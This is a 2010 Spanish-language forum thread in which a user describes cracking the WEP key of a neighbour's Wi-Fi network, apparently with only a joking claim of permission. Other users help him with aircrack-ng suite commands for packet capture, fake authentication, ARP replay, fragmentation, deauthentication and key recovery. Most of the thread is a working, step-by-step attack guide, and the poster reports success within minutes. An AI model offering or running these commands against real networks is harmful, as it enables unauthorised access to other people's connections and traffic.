Título: [Seguimientos/Crónicas]Cracking wifi - Ataque básico Publicado por: Debci en 24 Junio 2010, 17:40 pm ATAQUE WIFI BÁSICO Hola a todos, hoy me he propuesto crackear la contraseña del wifi, de mi vecino, que por supuesto tengo permiso, me he informado, he leido, he estudiado y he llegado a la conclusion del siguiente ataque: Primero de todo analizo el perimetro de redes wifi: airodump-ng mon0 Código: CH 11 ][ Elapsed: 1 min ][ 2010-06-24 17:22 Bieeen tengo la red que yo queria crackear, en mi caso Jazztel _____, por tanto me centro en su canal de comunicacion: airodump-ng -w wep -c 11 --bssid 00:15:___________ mon0 Y empiezo a ver sus datos concretos: Código: CH 11 ][ Elapsed: 5 mins ][ 2010-06-24 17:29 ][ fixed channel mon0: 1 Ahora empieza el ataque para comenzar a capturar paquetes, para lo cual, primero tengo que inyectarle y hacer una autentificación falsa: aireplay-ng -1 0 -a 00:15:___________ mon0 Y la asociacion de AP transcurre satisfactoriamente: Código: No source MAC (-h) specified. Using the device MAC (00:08:___________) Ahora empieza la captura de trafico y arp: aireplay-ng -3 -b 00:15:___________ mon0 Código: No source MAC (-h) specified. Using the device MAC (00:08:___________) Y por mucho que espero no suben los data, estudiando la situación he llegado a la conclusion de que esto ocurre porque no hay ningun cliente asociado que genere trafico de red, y creo que eso se hace en el punto dos de mi ataque, lo que ocurre es que me autentifico falso y al rato me kickea de la falsa autentificación. Esto es una guia de ataque básico y al mismo tiempo mi duda. Alguien sabe como puedo solventar este problema sin tener que esperar a que mi vecino empieze a navegar/descargar, en general usar su red? Saludos y gracias por vuestra atención. Título: Re: [Seguimientos/Crónicas]Cracking wifi - Ataque básico Publicado por: jcrack en 24 Junio 2010, 22:47 pm hola ;D
despues de ataque 1 autenticacion falsa prueba ataque 5 de fragmentacion asi: aireplay-ng -1 0 -a(bssid) -h 00:11:22:33:44:55 -e(essid) wlan0 debe salir la carita feliz y aparece OPEN debajo de auth aireplay-ng -5 -b(mac del AP) -h 00:11:22:33:44:55 wlan0 ................ ................ si no funciona cambia el ataque 5 por el 0 : aireplay-ng -0 5 -a (bssid) wlan0 aircrack-ng -n 64 -b (bssid) archivo-01.cap ................ me avisas como te fue gracias Título: Re: [Seguimientos/Crónicas]Cracking wifi - Ataque básico Publicado por: Debci en 24 Junio 2010, 23:19 pm hola ;D Lo de open ya me salia, pero no ocurria nada mas.despues de ataque 1 autenticacion falsa prueba ataque 5 de fragmentacion asi: aireplay-ng -1 0 -a(bssid) -h 00:11:22:33:44:55 -e(essid) wlan0 debe salir la carita feliz y aparece OPEN debajo de auth aireplay-ng -5 -b(mac del AP) -h 00:11:22:33:44:55 wlan0 ................ ................ si no funciona cambia el ataque 5 por el 0 : aireplay-ng -0 5 -a (bssid) wlan0 aircrack-ng -n 64 -b (bssid) archivo-01.cap ................ me avisas como te fue gracias Saludos Título: Re: [Seguimientos/Crónicas]Cracking wifi - Ataque básico Publicado por: dani__ en 24 Junio 2010, 23:31 pm para generar tráfico con nuestra propia tarjeta deberemos echar mano del tuto que Heavyloto ya publicó en su día para tal fin, y nosotros vamos a usar ahora.
Una vez empezado todo el proceso y viendo que no suben las datas, debemos fijarnos si hay clientes conectados. En caso afirmativo debemos asociarnos con un cliente y para ello abriremos Shell y escribiremos en la misma: Código: Código: aireplay-ng -3 –b (Mac víctima) –h (Mac cliente) (las siglas de nuestra interface) Esto es un A3. Reinyección de petición ARP. Una vez presionemos enter, veremos como en algunos casos, las datas comienzan a moverse, en ocasiones de una forma escandalosa, pero es lo que queremos no?. Falta aclarar que es posible que tardemos en capturar peticiones ARP, y este factor es mas que IMPORTANTE, ya que necesitamos de ellas, y si no hay tráfico el ataque no resultará efectivo. En el caso de que no haya ningún cliente, o aunque lo haya, no exista tráfico entre el AP y el cliente, deberemos generarlo nosotros mismos, utilizando para ello nuestra propia tarjeta. Para esto abrimos Shell, y escribiremos lo siguiente: Código: Código: aireplay-ng -1 30 –o 1 –e (nombre del Ap) –a (Mac victima) –h (nuestra Mac) (nuestra interface) Ahora hemos lanzado un A1. Ataque 1. Autentificación falsa Esto hace que nosotros mismos nos asociemos como un cliente, y solo nos queda repetir el primer ataque, pues ahora ya hay cliente, nosotros mismos. fuente:http://foro.elhacker.net/wireless_en_linux/manual_wifislax_wifiway_avanzado_wep_y_wpa_rockeropasiempre_heavyloto_y_zydas-t261907.0.html (http://foro.elhacker.net/wireless_en_linux/manual_wifislax_wifiway_avanzado_wep_y_wpa_rockeropasiempre_heavyloto_y_zydas-t261907.0.html) Suerte. Título: Re: [Seguimientos/Crónicas]Cracking wifi - Ataque básico Publicado por: Debci en 25 Junio 2010, 09:18 am Conseguido, en poco menos de 5 minutos madre mia...
solo que a veces consigo que suban a velocidad bestial los ivs y otrs veces tengo que hacer la falsa autentificacion y posteriormente un aireplay-ng -3 para conseguir trafico de red. Saludos |